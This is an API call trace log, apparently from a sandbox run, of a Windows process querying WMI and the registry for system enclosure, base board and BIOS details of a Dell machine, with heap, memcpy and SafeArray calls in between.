[0669.635] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ ()
[0669.652] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.717] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.717] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.729] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0669.729] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x22f170
[0669.729] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0669.729] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x2c) returned 0x22afd0
[0669.729] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22f170 | out: hHeap=0x1c0000) returned 1
[0669.730] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0xc8) returned 0x1f6760
[0669.730] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1f6760 | out: hHeap=0x1c0000) returned 1
[0669.730] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x38) returned 0x21e540
[0669.731] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x21e540 | out: hHeap=0x1c0000) returned 1
[0669.731] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x84) returned 0x213d60
[0669.731] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22afd0 | out: hHeap=0x1c0000) returned 1
[0669.734] memcpy (in: _Dst=0x134e698, _Src=0x23396c, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.736] memcpy (in: _Dst=0x134e698, _Src=0x233279, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.736] memcpy (in: _Dst=0x134e698, _Src=0x233974, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.736] memcpy (in: _Dst=0x134e698, _Src=0x23327f, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.736] memcpy (in: _Dst=0x134e698, _Src=0x233281, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.749] memcpy (in: _Dst=0x134e698, _Src=0x299189, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.750] memcpy (in: _Dst=0x134e698, _Src=0x29918b, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.750] memcpy (in: _Dst=0x134e698, _Src=0x29918d, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.750] memcpy (in: _Dst=0x134e698, _Src=0x29918f, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.750] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x2198b0
[0669.750] SafeArrayGetElemsize (psa=0x21e690) returned 0x8
[0669.751] memcpy (in: _Dst=0x134e480, _Src=0x134e3a8, _Size=0x8 | out: _Dst=0x134e480) returned 0x134e480
[0669.751] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x2198b0 | out: hHeap=0x1c0000) returned 1
[0669.751] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa8f0 | out: hHeap=0x1c0000) returned 1
[0669.751] memcpy (in: _Dst=0x134e698, _Src=0x233fce, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.798] EtwEventWrite (RegHandle=0x1100010001, EventDescriptor=0x7fefa2a60b0, UserDataCount=0x5, UserData=0x134e610) returned 0x0
[0669.803] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ ()
[0669.818] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.836] SetLastError (dwErrCode=0x0)
[0669.836] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0669.836] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0669.836] SetLastError (dwErrCode=0x0)
[0669.836] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9b0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9b0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0669.836] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9f0
[0669.836] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0669.837] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd4b0
[0669.837] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd4b0, pulNumLanguages=0x134e8a8 | out: pulNumLanguages=0x134e8a8) returned 1
[0669.837] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd4b0 | out: hHeap=0x1c0000) returned 1
[0669.903] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fda00
[0669.903] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fda00, pulNumLanguages=0x134e8a0 | out: pulNumLanguages=0x134e8a0) returned 1
[0669.904] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fda00 | out: hHeap=0x1c0000) returned 1
[0669.918] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.931] SetLastError (dwErrCode=0x0)
[0669.931] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0669.931] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9f0
[0669.931] SetLastError (dwErrCode=0x0)
[0669.931] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9f0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9f0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0669.931] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fda00
[0669.931] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9f0 | out: hHeap=0x1c0000) returned 1
[0669.931] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd4b0
[0669.931] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd4b0, pulNumLanguages=0x134e8a8 | out: pulNumLanguages=0x134e8a8) returned 1
[0669.931] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd4b0 | out: hHeap=0x1c0000) returned 1
[0669.935] malloc (_Size=0xa8) returned 0x403620
[0669.936] LoadLibraryW (lpLibFileName="WMI.DLL") returned 0x75830000
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiQueryAllDataW") returned 0x7feff338440
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiQuerySingleInstanceW") returned 0x7feff345600
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiSetSingleItemW") returned 0x7feff37b080
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiSetSingleInstanceW") returned 0x7feff37b350
[0669.941] GetProcAddress (hModule=0x75830000, lpProcName="WmiExecuteMethodW") returned 0x7feff37abd0
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiNotificationRegistrationW") returned 0x7feff32a760
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiMofEnumerateResourcesW") returned 0x7feff329660
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiFileHandleToInstanceNameW") returned 0x7feff37a760
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiDevInstToInstanceNameW") returned 0x7feff3457e0
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiQueryGuidInformation") returned 0x7feff329a70
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiOpenBlock") returned 0x7feff338380
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiCloseBlock") returned 0x7feff338650
[0669.942] GetProcAddress (hModule=0x75830000, lpProcName="WmiFreeBuffer") returned 0x7feff329b10
[0669.943] GetProcAddress (hModule=0x75830000, lpProcName="WmiEnumerateGuids") returned 0x7feff37a580
[0669.943] malloc (_Size=0x18) returned 0x3ef040
[0669.943] WmiOpenBlock () returned 0x0
[0669.946] malloc (_Size=0x1000) returned 0x4036d0
[0669.946] WmiQueryAllDataW () returned 0x0
[0669.947] WmiCloseBlock () returned 0x0
[0669.947] malloc (_Size=0x48) returned 0x3ed680
[0669.947] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x218
[0669.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7fef4a510f0, lpParameter=0x7fef4c23eb0, dwCreationFlags=0x0, lpThreadId=0x7fef4c23eb0 | out: lpThreadId=0x7fef4c23eb0*=0x138) returned 0x21c
[0669.950] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x134df48 | out: lpSystemTimeAsFileTime=0x134df48*(dwLowDateTime=0xa96e3230, dwHighDateTime=0x1dab599))
[0669.950] SetEvent (hEvent=0x218) returned 1
[0669.950] malloc (_Size=0x9a0) returned 0x4046e0
[0669.950] malloc (_Size=0x420) returned 0x405090
[0669.959] LoadStringW (in: hInstance=0x7fef4a50000, uID=0x3f, lpBuffer=0x134de70, cchBufferMax=256 | out: lpBuffer="System Enclosure") returned 0x10
[0669.964] lstrlenW (lpString="Inventec") returned 8
[0669.966] GetProcAddress (hModule=0x7feff600000, lpProcName=0x8) returned 0x7feff6013f0
[0669.966] SafeArrayPutElement (psa=0x234950, rgIndices=0x134e0e4, pv=0x134e0e0) returned 0x0
[0669.966] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x78) returned 0x1fa570
[0669.966] SafeArrayGetDim (psa=0x234950) returned 0x1
[0669.966] SafeArrayGetLBound (in: psa=0x234950, nDim=0x1, plLbound=0x134dea4 | out: plLbound=0x134dea4) returned 0x0
[0669.966] SafeArrayGetUBound (in: psa=0x234950, nDim=0x1, plUbound=0x134deb0 | out: plUbound=0x134deb0) returned 0x0
[0669.966] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233e30
[0669.967] SafeArrayGetDim (psa=0x234950) returned 0x1
[0669.967] SafeArrayGetUBound (in: psa=0x234950, nDim=0x1, plUbound=0x134de68 | out: plUbound=0x134de68) returned 0x0
[0669.967] SafeArrayGetElemsize (psa=0x234950) returned 0x2
[0669.967] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233e60
[0669.967] SafeArrayGetElemsize (psa=0x234a50) returned 0x2
[0669.967] SafeArrayGetElement (in: psa=0x234950, rgIndices=0x134dd40, pv=0x134dd70 | out: pv=0x134dd70) returned 0x0
[0669.967] SafeArrayPutElement (psa=0x234a50, rgIndices=0x233e60, pv=0x134dd78) returned 0x0
[0669.967] SafeArrayRedim (in: psa=0x234a50, psaboundNew=0x233e78 | out: psa=0x234a50) returned 0x0
[0669.968] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233e60 | out: hHeap=0x1c0000) returned 1
[0669.969] SafeArrayGetLBound (in: psa=0x234a50, nDim=0x1, plLbound=0x134ddd4 | out: plLbound=0x134ddd4) returned 0x0
[0669.969] SafeArrayGetUBound (in: psa=0x234a50, nDim=0x1, plUbound=0x134ddd0 | out: plUbound=0x134ddd0) returned 0x0
[0669.969] SafeArrayGetElement (in: psa=0x234a50, rgIndices=0x134de78, pv=0x134de08 | out: pv=0x134de08) returned 0x0
[0669.970] SafeArrayPutElement (psa=0x2349d0, rgIndices=0x134de78, pv=0x134de08) returned 0x0
[0669.971] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233e30 | out: hHeap=0x1c0000) returned 1
[0669.971] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0669.971] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x78) returned 0x1fa570
[0669.971] SafeArrayGetDim (psa=0x2349d0) returned 0x1
[0669.971] SafeArrayGetLBound (in: psa=0x2349d0, nDim=0x1, plLbound=0x134dd04 | out: plLbound=0x134dd04) returned 0x0
[0669.971] SafeArrayGetUBound (in: psa=0x2349d0, nDim=0x1, plUbound=0x134dd10 | out: plUbound=0x134dd10) returned 0x0
[0669.971] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233e30
[0669.971] SafeArrayGetDim (psa=0x2349d0) returned 0x1
[0669.972] SafeArrayGetUBound (in: psa=0x2349d0, nDim=0x1, plUbound=0x134dcc8 | out: plUbound=0x134dcc8) returned 0x0
[0669.972] SafeArrayGetElemsize (psa=0x2349d0) returned 0x4
[0669.972] SafeArrayGetElement (in: psa=0x2349d0, rgIndices=0x134de00, pv=0x134de30 | out: pv=0x134de30) returned 0x0
[0669.972] SafeArrayGetElement (in: psa=0x2349d0, rgIndices=0x134de00, pv=0x134de30 | out: pv=0x134de30) returned 0x0
[0669.973] memcpy (in: _Dst=0x134ddf8, _Src=0x1fda20, _Size=0x4 | out: _Dst=0x134ddf8) returned 0x134ddf8
[0669.974] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233e30 | out: hHeap=0x1c0000) returned 1
[0669.978] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0669.978] lstrlenW (lpString="PVT") returned 3
[0669.979] lstrlenW (lpString="JP7XY4J") returned 7
[0669.979] lstrlenW (lpString="To Be Filled By O.E.M.") returned 22
[0669.981] GetProcAddress (hModule=0x7feff600000, lpProcName=0x9) returned 0x7feff601180
[0669.987] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd9f0
[0669.987] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd9f0, pulNumLanguages=0x134e8a0 | out: pulNumLanguages=0x134e8a0) returned 1
[0669.987] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9f0 | out: hHeap=0x1c0000) returned 1
[0669.994] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0670.007] SetLastError (dwErrCode=0x0)
[0670.007] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0670.007] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fda00
[0670.007] SetLastError (dwErrCode=0x0)
[0670.007] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fda00, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fda00, pcchLanguagesBuffer=0x134e7b0) returned 1
[0670.007] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9f0
[0670.007] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fda00 | out: hHeap=0x1c0000) returned 1
[0670.007] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x22f530
[0670.008] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x22f530, pulNumLanguages=0x134e8a8 | out: pulNumLanguages=0x134e8a8) returned 1
[0670.008] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22f530 | out: hHeap=0x1c0000) returned 1
[0670.020] LoadStringW (in: hInstance=0x7fef4a50000, uID=0x3e, lpBuffer=0x134de80, cchBufferMax=256 | out: lpBuffer="Base Board") returned 0xa
[0670.022] lstrlenW (lpString="Dell") returned 4
[0670.022] lstrlenW (lpString="0D61XP") returned 6
[0670.023] lstrlenW (lpString="A00") returned 3
[0670.023] lstrlenW (lpString="..CN747510BO0504.") returned 17
[0670.029] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fda00
[0670.030] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fda00, pulNumLanguages=0x134e8a0 | out: pulNumLanguages=0x134e8a0) returned 1
[0670.030] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fda00 | out: hHeap=0x1c0000) returned 1
[0670.066] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0670.084] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0670.096] SetLastError (dwErrCode=0x0)
[0670.096] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0670.096] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9f0
[0670.096] SetLastError (dwErrCode=0x0)
[0670.096] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9f0, pcchLanguagesBuffer=0x134e7b0 | out: pulNumLanguages=0x134e8a8, pwszLanguagesBuffer=0x1fd9f0, pcchLanguagesBuffer=0x134e7b0) returned 1
[0670.097] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fda00
[0670.097] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9f0 | out: hHeap=0x1c0000) returned 1
[0670.097] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x22f530
[0670.097] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x22f530, pulNumLanguages=0x134e8a8 | out: pulNumLanguages=0x134e8a8) returned 1
[0670.097] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22f530 | out: hHeap=0x1c0000) returned 1
[0670.108] _wtoi (_String="04") returned 4
[0670.108] _wtoi (_String="14") returned 14
[0670.108] GetLocalTime (in: lpSystemTime=0x134d530 | out: lpSystemTime=0x134d530*(wYear=0x7e8, wMonth=0x6, wDayOfWeek=0x1, wDay=0x3, wHour=0xb, wMinute=0x25, wSecond=0x21, wMilliseconds=0x3c0))
[0670.109] _wtoi (_String="01") returned 1
[0670.109] _vsnwprintf (in: _Buffer=0x134d540, _BufferCount=0x63, _Format="%d%02d%02d000000.000000+000", _ArgList=0x134d4c8 | out: _Buffer="20140401000000.000000+000") returned 25
[0670.110] RegQueryValueExW (in: hKey=0x228, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x134d6f4, lpData=0x134ddb0, lpcbData=0x134d6e0*=0x410 | out: lpType=0x134d6f4*=0x7, lpData=0x134ddb0*, lpcbData=0x134d6e0*=0x18) returned 0x0
[0670.110] GetProcAddress (hModule=0x7feff600000, lpProcName=0x17) returned 0x7feff607080
[0670.111] SafeArrayAccessData (in: psa=0x234a10, ppvData=0x134d700 | out: ppvData=0x134d700) returned 0x0
[0670.111] GetProcAddress (hModule=0x7feff600000, lpProcName=0x18) returned 0x7feff6070b0
[0670.111] SafeArrayUnaccessData (psa=0x234a10) returned 0x0
[0670.111] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x78) returned 0x1fa570
[0670.111] SafeArrayGetDim (psa=0x234a90) returned 0x1
[0670.111] SafeArrayGetLBound (in: psa=0x234a90, nDim=0x1, plLbound=0x134d424 | out: plLbound=0x134d424) returned 0x0
[0670.111] SafeArrayGetUBound (in: psa=0x234a90, nDim=0x1, plUbound=0x134d430 | out: plUbound=0x134d430) returned 0x0
[0670.111] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233ec0
[0670.111] SafeArrayGetDim (psa=0x234a90) returned 0x1
[0670.111] SafeArrayGetUBound (in: psa=0x234a90, nDim=0x1, plUbound=0x134d3e8 | out: plUbound=0x134d3e8) returned 0x0
[0670.111] SafeArrayGetElemsize (psa=0x234a90) returned 0x8
[0670.112] SafeArrayGetElement (in: psa=0x234a90, rgIndices=0x134d378, pv=0x134d380 | out: pv=0x134d380) returned 0x0
[0670.112] memcpy (in: _Dst=0x134d378, _Src=0x1fda20, _Size=0x8 | out: _Dst=0x134d378) returned 0x134d378
[0670.113] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233ec0 | out: hHeap=0x1c0000) returned 1
[0670.113] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0670.118] lstrlenW (lpString="JP7XY4J") returned 7
[0670.119] lstrlenW (lpString="Dell Inc.") returned 9
[0670.120] lstrlenW (lpString="03/09/2011") returned 10
[0670.120] _wtoi (_String="03") returned 3
[0670.120] _wtoi (_String="2011") returned 2011
[0670.129] GetLocalTime (in: lpSystemTime=0x134d530 | out: lpSystemTime=0x134d530*(wYear=0x7e8, wMonth=0x6, wDayOfWeek=0x1, wDay=0x3, wHour=0xb, wMinute=0x25, wSecond=0x21, wMilliseconds=0x3d0))
[0670.129] _wtoi (_String="09") returned 9
[0670.129] _vsnwprintf (in: _Buffer=0x134d540, _BufferCount=0x63, _Format="%d%02d%02d000000.000000+000", _ArgList=0x134d4c8 | out: _Buffer="20110309000000.000000+000") returned 25
[0670.130] lstrlenW (lpString="1.56") returned 4
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d694) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.131] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.132] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.132] SafeArrayPutElement (psa=0x234a10, rgIndices=0x134d698, pv=0x134d6c0) returned 0x0
[0670.132] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x78) returned 0x1fa570
[0670.132] SafeArrayGetDim (psa=0x234a10) returned 0x1
[0670.132] SafeArrayGetLBound (in: psa=0x234a10, nDim=0x1, plLbound=0x134d454 | out: plLbound=0x134d454) returned 0x0
[0670.132] SafeArrayGetUBound (in: psa=0x234a10, nDim=0x1, plUbound=0x134d460 | out: plUbound=0x134d460) returned 0x0
[0670.132] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233ec0
[0670.132] SafeArrayGetDim (psa=0x234a10) returned 0x1
[0670.132] SafeArrayGetUBound (in: psa=0x234a10, nDim=0x1, plUbound=0x134d418 | out: plUbound=0x134d418) returned 0x0
[0670.132] SafeArrayGetElemsize (psa=0x234a10) returned 0x4
[0670.132] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.133] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.133] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.133] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.133] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.134] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.134] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.134] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.134] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.135] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.135] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.135] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.135] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.136] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.136] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.137] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.137] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.137] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.138] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.138] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.138] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203280, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203284, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203288, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
